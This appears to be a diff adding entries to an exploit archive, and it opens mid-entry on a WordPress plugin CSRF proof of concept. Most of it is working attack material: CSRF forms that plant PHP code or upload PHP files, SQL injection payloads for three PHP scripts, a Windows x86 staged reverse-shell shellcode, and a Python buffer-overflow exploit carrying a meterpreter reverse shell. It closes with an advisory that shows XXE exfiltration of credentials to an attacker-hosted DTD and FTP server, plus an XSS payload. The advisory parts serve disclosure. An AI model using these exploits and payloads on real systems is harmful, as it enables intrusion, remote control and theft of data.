The Global Content Blocks WordPress Plugin lets users create their own shortcodes to insert reusable code snippets, PHP or HTML including forms, opt-in boxes, iframes, Adsense code, etc, into pages and posts as well as widgets and directly into php content. Global Content Blocks is affected by Cross-Site Request Forgery. Amongst others, this issue can be used to update a content block to overwrite it with arbitrary PHP code. Visiting a page or blog post that uses this content block will cause the attacker's PHP code to be executed.
Details
The issue exists due to the fact that Global Content Blocks does not use the Cross-Site Request Forgery protection provided by WordPress. Actions with Global Content Blocks have a predictable format, thus an attacker can forge a request that can be executed by a logged in Administrator. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.
Proof of concept
The following proof of concept will update/overwrite the content block with id 1. In order to run the attacker's PHP code, a page/blog needs to be viewed that contains this content block (eg, [contentblock id=1]).
-->
<html>
<body>
<form action="http://<target>/wp-admin/options-general.php?page=global-content-blocks" method="POST">
<input type="hidden" name="gcb_view" value="update" />
<input type="hidden" name="update_it" value="1" />
<input type="hidden" name="gcb_name" value="Foo" />
<input type="hidden" name="gcb_custom_id" value="" />
<input type="hidden" name="gcb_type" value="php" />
<input type="hidden" name="gcb_description" value="" />
<input type="hidden" name="gcbvalue" value="passthru('ls -la');" />
<input type="hidden" name="gcb_updateshortcode" value="Update" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

68
platforms/php/webapps/41488.html Executable file
View file

@ -0,0 +1,68 @@
<!--
Source: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_file_manager_wordpress_plugin.html
Abstract
A Cross-Site Request Forgery (CSRF) vulnerability was found in the File Manager WordPress Plugin. Among others, this issue can be used to upload arbitrary PHP files to the server.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160712-0029
Tested versions
This issue was successfully tested on the File Manager WordPress Plugin version 3.0.1.
Fix
There is currently no fix available.
Introduction
The File Manager WordPress Plugin is a file manager for WordPress which can be used to upload, delete, copy, move, rename, archive and extract files without the need for FTP. It was discovered that the File Manager WordPress Plugin is vulnerable to Cross-Site Request Forgery.
Details
The upload form used by the plugin has no protection against CSRF attacks. As a result an attacker can for example upload arbitrary PHP files to the server.
Please note that the target user needs to be logged in.
Proof of concept
The target parameter holds a Base64-encoded destination path. By using the proof of concept request below a file named info.php is uploaded to the /wp-content/uploads/file-manager/ directory.
When uploaded, this file can be requested from the outside as follows:
http://<wp-server>/wp-content/uploads/file-manager/info.php
Request:
-->
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <wp-server>
Cookie: ALL_YOUR_WP_COOKIES
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------6427194103423794601262893907
-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="cmd"
upload
-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="target"
l1_d3AtY29udGVudC91cGxvYWRzL2ZpbGUtbWFuYWdlcg
-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="suffix"
~
-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="action"
connector
-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="upload[]"; filename="info.php"
Content-Type: text/php
<?php
phpinfo();
?>
-----------------------------6427194103423794601262893907--

20
platforms/php/webapps/41489.txt Executable file
View file

@ -0,0 +1,20 @@
# # # # #
# Exploit Title: SchoolDir - SQL Injection
# Google Dork: N/A
# Date: 01.03.2017
# Vendor Homepage: http://www.brynamics.xyz/
# Software: https://codecanyon.net/item/schooldir/19326269
# Demo: http://www.brynamics.xyz/schooldir/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search?searchItem=[SQL]&criteria=schools
# http://localhost/[PATH]/sortsearch?School_type=[SQL]&fees=2&ownership=federal&location=Nigeria&searchItem=Harvard+University&criteria=schools
# If you don't know to use the vulnerabilities, you don't need to check it.
# Etc...
# # # # #

21
platforms/php/webapps/41490.txt Executable file
View file

@ -0,0 +1,21 @@
# # # # #
# Exploit Title: Rage Faces Script v1.3 - SQL Injection
# Google Dork: N/A
# Date: 01.03.2017
# Vendor Homepage: http://www.memesoftware.com/
# Software: http://www.memesoftware.com/ragefaces.php
# Demo: http://ragefaces.memesoftware.com/
# Version: 1.3
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/face.php?face=[SQL]
-2')+/*!50000union*/+select+1,2,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5-- -
# http://localhost/[PATH]/create.php?create=[SQL]
-1'+/*!50000union*/+Select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3,4,5,6,7,8,9-- -
# Etc...
# # # # #

19
platforms/php/webapps/41491.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Meme Maker Script 2.1 - SQL Injection
# Google Dork: N/A
# Date: 01.03.2017
# Vendor Homepage: http://www.memesoftware.com/
# Software: http://www.memesoftware.com/mememaker.php
# Demo: http://www.memefaces.me/
# Version: 2.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/profil.php?user=[SQL]
# -2'+/*!50000union*/+select+1,2,3,4,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),6,7-- -
# Etc...
# # # # #

344
platforms/win_x86/shellcode/41481.asm Executable file
View file

@ -0,0 +1,344 @@
########### Windows x86 Reverse TCP Staged Alphanumeric Shellcode CreateProcessA cmd.exe ########
########### Author: Snir Levi, Applitects #############
## 332 Bytes ##
## For Educational Purposes Only ##
Date: 01.03.17
Author: Snir Levi
Email: snircontact@gmail.com
https://github.com/snir-levi/
IP - 127.0.0.1
PORT - 4444
Tested on:
Windows 7
Windows 10
###Usage###
Victim Executes the first stage shellcode, and opens tcp connection
After Connection is established, send the Alphanumeric stage to the connection
nc -lvp 4444
connect to [127.0.0.1] from localhost [127.0.0.1] (port)
RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\>
###########
##Shellcode##
#### Second Stage Alphanumeric shellcode: #####
RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS
R push edx
P push eax
hoces push 0x7365636f //oces
htePr push 0x72506574 //tePr
hCrea push 0x61657243 //Crea
T push esp
Q push ecx
PX will be replaced with call [esi] (0x16ff)
L*8 dec esp // offset esp to kernel32.dll Address
Y pop ecx // ecx = kernel32
F*4 inc esi -> offset [esi+4]
PX will be replaced with mov [esi],eax (0x0689)
N*4 dec esi -> offset [esi]
j0 push 0x30
X pop eax
H*48 dec eax // zeroing eax
P push eax
hessA push 0x41737365 //essA (will be null terminated)
hProc push 0x636f7250 //Proc
hExit push 0x74697845 //Exit
T push esp
Q push ecx
PX will be replaced with call [esi] (0x16ff)
F*8 inc esi -> offset [esi+8]
PX will be replaced with mov [esi],eax (0x0689)
Z*10 offset stack to &processinfo
j0 push 0x30
Y pop ecx
I*48 dec ecx // zeroing ecx
T push esp
X pop eax //eax = &PROCESS_INFORMATION
Q*4 push ecx //sub esp,16
W push edi
W push edi
W push edi
Q push ecx
Q push ecx
B inc edx
R push edx
Q*10 push ecx
jD push 0x44
T push esp
Z pop edx //edx = &STARTUPINFOA
hexeC push 0x65
hcmd. push 0x78652e64
T push esp // &'cmd.exe'
Y pop ecx
P push eax // &PROCESS_INFORMATION
R push edx // &STARTUPINFOA
j0 push 0x30
Z pop edx
J*48 dec edx // zeroing edx
R*3 push edx
B inc edx
R push edx
J dec edx
R*2 push edx
Q push ecx ; &'cmd.exe'
R push edx
A*7 inc ecx //offset ecx to [C]exeh -> will be null terminated
N*4 dec esi //offset [esi+4] to CreateProccesA
S push ebx ; return address
## First Stage Shellcode ##
global _start
section .text
_start:
xor eax,eax
push eax ; null terminator for createProcA
mov eax,[fs:eax+0x30] ; Proccess Enviroment Block
mov eax,[eax+0xc]
mov esi,[eax+0x14]
lodsd
xchg esi,eax
lodsd
mov ebx,[eax+0x10] ; kernel32
mov ecx,[ebx+0x3c] ; DOS->elf_anew
add ecx, ebx; Skip to PE start
mov ecx, [ecx+0x78] ; offset to export table
add ecx,ebx ; kernel32 image_export_dir
mov esi,[ecx+0x20] ; Name Table
add esi,ebx
xor edx,edx
getProcAddress:
inc edx
lodsd
add eax,ebx
cmp dword [eax],'GetP'
jne getProcAddress
cmp dword [eax+4],'rocA'
jne getProcAddress
;---Function Adresses Chain----
;[esi] GetProcAddress
;[esi+12] WSAstartup
;[esi+16] WSASocketA
;[esi+20] connect
;[esi+24] recv
;[esi+28] kernel32
;Alphanumeric stage store:
;[esi+4] CreateProcessA
;[esi+8] ExitProccess
mov esi,[ecx+0x1c] ; Functions Addresses Chain
add esi,ebx
mov edx,[esi+edx*4]
add edx,ebx ; GetProcAddress
sub esp, 32 ; Buffer for the function addresses chain
push esp
pop esi
mov [esp],edx ; esi offset 0 -> GetProcAddress
mov [esi+28],ebx ;esi offset 28 -> kernel32
;--------winsock2.dll Address--------------
xor edi,edi
push edi
push 0x41797261 ; Ayra
push 0x7262694c ; rbiL
push 0x64616f4c ; daoL
push esp
push ebx
call [esi]
;-----ws2_32.dll Address-------
xor ecx,ecx
push ecx
mov cx, 0x3233 ; 0023
push ecx
push 0x5f327377 ; _2sw
push esp
call eax
mov ebp,eax ;ebp = ws2_32.dll
;-------WSAstartup Address-------------
xor ecx,ecx
push ecx
mov cx, 0x7075 ; 00up
push ecx
push 0x74726174 ; trat
push 0x53415357 ; SASW
push esp
push ebp
call [esi]
mov [esi+12],eax ;esi offset 12 -> WSAstartup
;-------WSASocketA Address-------------
xor ecx,ecx
push ecx
mov cx, 0x4174 ; 00At
push ecx
push 0x656b636f ; ekco
push 0x53415357 ; SASW
push esp
push ebp
call [esi]
mov [esi+16],eax;esi offset 16 -> WSASocketA
;------connect Address-----------
push edi
mov ecx, 0x74636565 ; '\0tce'
shr ecx, 8
push ecx
push 0x6e6e6f63 ; 'nnoc'
push esp
push ebp
call [esi]
mov [esi+20],eax;esi offset 20 -> connect
;------recv Address-------------
push edi
push 0x76636572 ;vcer
push esp
push ebp
call [esi]
mov [esi+24],eax;esi offset 24 -> recv
;------call WSAstartup()----------
xor ecx,ecx
sub sp,700
push esp
mov cx,514
push ecx
call [esi+12]
;--------call WSASocket()-----------
; WSASocket(AF_INET = 2, SOCK_STREAM = 1,
; IPPROTO_TCP = 6, NULL,
;(unsigned int)NULL, (unsigned int)NULL);
push eax ; if successful, eax = 0
push eax
push eax
mov al,6
push eax
mov al,1
push eax
inc eax
push eax
call [esi+16]
xchg eax, edi ; edi = SocketRefernce
;--------call connect----------
;struct sockaddr_in {
; short sin_family;
; u_short sin_port;
; struct in_addr sin_addr;
; char sin_zero[8];
;};
push byte 0x1
pop edx
shl edx, 24
mov dl, 0x7f ;edx = 127.0.0.1 (hex)
push edx
push word 0x5c11; port 4444
push word 0x2
;int connect(
;_In_ SOCKET s,
;_In_ const struct sockaddr *name,
;_In_ int namelen
;);
mov edx,esp
push byte 16 ; sizeof(sockaddr)
push edx ; (sockaddr*)
push edi ; socketReference
call [esi+20]
;--------call recv()----------
;int recv(
;_In_ SOCKET s,
;_Out_ char *buf,
;_In_ int len,
;_In_ int flags
;);
stage:
push eax
mov ax,950
push eax ;buffer length
push esp
pop ebp
sub ebp,eax ; set buffer to [esp-950]
push ebp ;&buf
push edi ;socketReference
call [esi+24]
executeStage:
xor edx,edx
mov byte [ebp+eax-1],0xc3 ; end of the Alphanumeric buffer -> ret
mov byte [ebp+96],dl ; null terminator to ExitProcess
mov byte [ebp-1],0x5b ; buffer start: pop ebx -> return address
dec ebp
mov word [ebp+20],0x16ff ; call DWORD [esi]
mov word [ebp+35],0x0689 ; mov [esi],eax
mov word [ebp+110],0x16ff; call DWORD [esi]
mov word [ebp+120],0x0689; mov [esi],eax
mov ax,0x4173 ; As (CreateProcessA)
mov ecx,[esi+28] ; ecx = kernel32
dec dl ;edx = 0x000000ff
call ebp ; Execute Alphanumeric stage
executeShell:
mov [ecx],dl ;null terminator to 'cmd.exe'
call dword [esi] ;createProcA
push eax
call dword [esi+4] ; ExitProccess
-----------------------
unsigned char shellcode[]=
"\x31\xc0\x50\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x4b\x3c\x01\xd9\x8b\x49\x78\x01\xd9\x8b\x71\x20\x01\xde\x31\xd2\x42\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x8b\x71\x1c\x01\xde\x8b\x14\x96\x01\xda\x83\xec\x20\x54\x5e\x89\x14\x24\x89\x5e\x1c\x31\xff\x57\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\x16\x31\xc9\x51\x66\xb9\x33\x32\x51\x68\x77\x73\x32\x5f\x54\xff\xd0\x89\xc5\x31\xc9\x51\x66\xb9\x75\x70\x51\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x0c\x31\xc9\x51\x66\xb9\x74\x41\x51\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x10\x57\xb9\x65\x65\x63\x74\xc1\xe9\x08\x51\x68\x63\x6f\x6e\x6e\x54\x55\xff\x16\x89\x46\x14\x57\x68\x72\x65\x63\x76\x54\x55\xff\x16\x89\x46\x18\x31\xc9\x66\x81\xec\xf4\x01\x54\x66\xb9\x02\x02\x51\xff\x56\x0c\x50\x50\x50\xb0\x06\x50\xb0\x01\x50\x40\x50\xff\x56\x10\x97\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52\x66\x68\x11\x5c\x66\x6a\x02\x89\xe2\x6a\x10\x52\x57\xff\x56\x14\x50\x66\xb8\xb6\x03\x50\x54\x5d\x29\xc5\x55\x57\xff\x56\x18\x31\xd2\xc6\x44\x05\xff\xc3\x88\x55\x60\xc6\x45\xff\x5b\x4d\x66\xc7\x45\x14\xff\x16\x66\xc7\x45\x23\x89\x06\x66\xc7\x45\x6e\xff\x16\x66\xc7\x45\x78\x89\x06\x66\xb8\x73\x41\x8b\x4e\x1c\xfe\xca\xff\xd5\x88\x11\xff\x16\x50\xff\x56\x04";

69
platforms/windows/remote/41479.py Executable file
View file

@ -0,0 +1,69 @@
# Exploit Title: SysGauge 1.5.18 buffer overflow in SMTP connection verification function leads to code execution
# Date: 2017-02-28
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe
# Version: 1.5.18
# Tested on: Windows Server 2008 R2 Standard x64
# CVE : requested
# The shellcode has to be split into 2 pieces for the exploit to work and has to be placed at the offsets like shown below.
# The 1st part can be max. 236 bytes
# The 2nd part can be max. 76 (leave at least 4 NOPs)
import socket
# QtGui4.dll 0x6527635E - CALL ESP
jmp = "\x5e\x63\x27\x65"
nops = "\x90"*8
# reverse meterpreter shell 306 bytes long bad chars \x00\x0a\x0b\x20
#IP: 192.168.198.128, PORT: 4444
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b \x00\x0a\x0d\x20 --smallest
rev_met_1=("\x6a\x47\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1f\x2d"
"\x97\x97\x83\xeb\xfc\xe2\xf4\xe3\xc5\x15\x97\x1f\x2d\xf7\x1e"
"\xfa\x1c\x57\xf3\x94\x7d\xa7\x1c\x4d\x21\x1c\xc5\x0b\xa6\xe5"
"\xbf\x10\x9a\xdd\xb1\x2e\xd2\x3b\xab\x7e\x51\x95\xbb\x3f\xec"
"\x58\x9a\x1e\xea\x75\x65\x4d\x7a\x1c\xc5\x0f\xa6\xdd\xab\x94"
"\x61\x86\xef\xfc\x65\x96\x46\x4e\xa6\xce\xb7\x1e\xfe\x1c\xde"
"\x07\xce\xad\xde\x94\x19\x1c\x96\xc9\x1c\x68\x3b\xde\xe2\x9a"
"\x96\xd8\x15\x77\xe2\xe9\x2e\xea\x6f\x24\x50\xb3\xe2\xfb\x75"
"\x1c\xcf\x3b\x2c\x44\xf1\x94\x21\xdc\x1c\x47\x31\x96\x44\x94"
"\x29\x1c\x96\xcf\xa4\xd3\xb3\x3b\x76\xcc\xf6\x46\x77\xc6\x68"
"\xff\x72\xc8\xcd\x94\x3f\x7c\x1a\x42\x45\xa4\xa5\x1f\x2d\xff"
"\xe0\x6c\x1f\xc8\xc3\x77\x61\xe0\xb1\x18\xd2\x42\x2f\x8f\x2c"
"\x97\x97\x36\xe9\xc3\xc7\x77\x04\x17\xfc\x1f\xd2\x42\xfd\x1a"
"\x45\x57\x3f\xd9\xad\xff\x95\x1f\x3c\xcb\x1e\xf9\x7d\xc7\xc7"
"\x4f\x6d\xc7\xd7\x4f\x45\x7d\x98\xc0\xcd\x68\x42\x88\x47\x87"
"\xc1\x48\x45\x0e\x32\x6b\x4c")
rev_met_2=("\x68\x42\x9a\xed\xe3\x9b\xe0\x63"
"\x9f\xe2\xf3\x45\x67\x22\xbd\x7b\x68\x42\x75\x2d\xfd\x93\x49"
"\x7a\xff\x95\xc6\xe5\xc8\x68\xca\xa6\xa1\xfd\x5f\x45\x97\x87"
"\x1f\x2d\xc1\xfd\x1f\x45\xcf\x33\x4c\xc8\x68\x42\x8c\x7e\xfd"
"\x97\x49\x7e\xc0\xff\x1d\xf4\x5f\xc8\xe0\xf8\x96\x54\x36\xeb"
"\xe2\x79\xdc\x2d\x97\x97")
buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1
port = 25
s = socket.socket()
ip = '0.0.0.0'
s.bind((ip, port))
s.listen(5)
print 'Listening on SMTP port: '+str(port)
print(len(rev_met_1))
print(len(rev_met_2))
while True:
conn, addr = s.accept()
conn.send('220 '+buffer+'ESMTP Sendmail \r\n')
conn.close()

226
platforms/xml/webapps/41482.txt Executable file
View file

@ -0,0 +1,226 @@
SEC Consult Vulnerability Lab Security Advisory < 20170301-0 >
=======================================================================
title: XML External Entity Injection (XXE),
Reflected Cross Site Scripting
product: Aruba AirWave
vulnerable version: <=8.2.3
fixed version: 8.2.3.1
CVE number: CVE-2016-8526, CVE-2016-8527
impact: high
homepage: http://www.arubanetworks.com/
found: 2016-11-21
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Aruba, a Hewlett Packard Enterprise company, (formerly "Aruba Networks, Inc.")
is a networking vendor selling enterprise wireless LAN and edge access
networking equipment. The company has over 1,800 employees and is
headquartered in Sunnyvale, California. Aruba's core products are access points
(APs), mobility controllers, and network management software through their
Airwave Management Platform product."
Source: https://en.wikipedia.org/wiki/Aruba_Networks
Business recommendation:
------------------------
SEC Consult recommends not to use the product in a production environment
until a thorough security review has been performed by security professionals
and all identified issues have been resolved.
Vulnerability overview/description:
-----------------------------------
1) XML External Entity Injection (CVE-2016-8526)
The used XML parser is resolving external XML entities which allows attackers
to read files and send requests to systems on the internal network (e.g port
scanning).
The vulnerability can be exploited by a low privileged read-only user
to read sensitive information / files with malicious XML code.
Note that as Aruba's passwords are encrypted with a shared static key,
privilege escalation to admin role is also possible!
Multiple different functions are affected by XXE.
According to the vendor another researcher has also found one of the XXE issues, hence
credits go to them as well.
Vendor: "Although the team hasn't reproduced this yet, Ive had other reports
come in through our bug bounty program last month about XXE issues in VisualRF.
One of the issues you reported is the same, and you reported three others that we
haven't seen yet."
2) Reflected Cross Site Scripting (CVE-2016-8527)
Due to the lack of input validation, an attacker can insert malicious JavaScript
code to be executed under a victim's browser context.
Proof of concept:
-----------------
1) XML External Entity Injection (CVE-2016-8526)
a) XXE in VisualRF Backup Sites
Login as any user role (including read-only/standard user)
Navigate to VisualRF > Floor Plans > Select 'View' under 'Network' section.
Select a campus (e.g. Default Campus) > Select 'Edit' >
Select action 'Export Floor Plans' > Ok
POST /visualrf/backup_sites HTTP/1.1
Host: <AirWaveHost>
[...]
xml=<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE x [<!ENTITY %25 foo SYSTEM "http://<AttackerHost>:1234/sectest.dtd">%25%66%6f%6f%3b%25%70%61%72%61%6d%31%3b]><visualrf:sites xmlns:visualrf="http://www.airwave.com/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="1">%26%65%78%66%69%6c%3b</visualrf:sites>
$ cat sectest.dtd
<!ENTITY % data SYSTEM "file:///<removed>">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://<Attacker>:2121/%data;'>">
$ python -m SimpleHTTPServer 1234
$ wget https://raw.githubusercontent.com/ONsec-Lab/scripts/master/xxe-ftp-server.rb
$ ruby xxe-ftp-server.rb
FTP. New client connected
< USER anonymous
< PASS Java1.8.0_102@
> 230 more data please!
< TYPE I
> 230 more data please!
< CWD [General]
[...]
< ; set global WLC credentials
> 230 more data please!
< wlc_user: <username>
> 230 more data please!
< wlc_pasw: <password>
[...]
b) XXE in Visual RF Site Restore
$ cat version.xml
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE x [<!ENTITY % foo SYSTEM "http://<AttackerHost>:1234/version.dtd">%foo;%param1;]>
&exfil;<backup backup-time="Mon Nov 21 14:44:41 CET 2016" build="${svn.build}" plan-mode="false" version="8.0.0"/>
$ zip backup_sectest.zip version.xml
adding: version.xml (deflated 16%)
And then just upload the backup_sectest.zip via the restore functionality.
POST /nf/visualrf_siterestore HTTP/1.1
Host: <AirWaveHost>
[...]
------WebKitFormBoundaryjPK7DdVbiNVDEJ2A
Content-Disposition: form-data; name="zip"; filename="backup_sectest.zip"
Content-Type: application/zip
[.. backup_sectest.zip ..]
------WebKitFormBoundaryjPK7DdVbiNVDEJ2A
Content-Disposition: form-data; name="import"
Import
------WebKitFormBoundaryjPK7DdVbiNVDEJ2A--
c) XXE in Visual RF Verify
POST /visualrf/verify/<Site-ID> HTTP/1.1
Host: <AirWaveHost>
[...]
<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE x [<!ENTITY % foo SYSTEM "http://<AttackerHost>:1234/sectest.dtd">%foo;%param1;]><visualrf:sites xmlns:visualrf="http://www.airwave.com/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="1"><site
[...]
/>&exfil;</site></visualrf:sites>
2) Reflected Cross Site Scripting (CVE-2016-8527)
Note that the XSS payload can be used with either HTTP parameter 'start' or 'end'.
GET /visualrf/group_list.xml?aps=1&start=%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3ca%3abody%20onload%3d'alert(/XSS/)'%2f%3e%3c%2fa%3e&end=500&match HTTP/1.1
Host: <AirWaveHost>
[...]
HTTP/1.1 200 OK
[...]
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<results>
<error>For input string: "<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(/XSS/)'/></a>"</error>
</results>
Vulnerable / tested versions:
-----------------------------
The following versions are affected by the identified vulnerabilities which
were the most recent versions at the time of discovery:
Aruba AirWave version <8.2.3.1
Vendor contact timeline:
------------------------
2016-11-23: Contacting vendor through aruba-sirt@hpe.com
2016-11-23: Vendor: Established communication over encrypted channel and asked
for extending the disclosure date due to the upcoming holidays
2017-01-18: CVE-2016-8526 was assigned for the XXE issue, and CVE-2016-8527 for
the reflected XSS issue.
2017-02-21: Aruba AirWave 8.2.3.1 was released.
2017-03-01: Coordinated disclosure of the security advisory.
Solution:
---------
Update to version 8.2.3.1 or later.
http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt
https://support.arubanetworks.com/Documentation/tabid/77/DMXModule/512/EntryId/23738/Default.aspx
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Pichaya Morimoto / @2017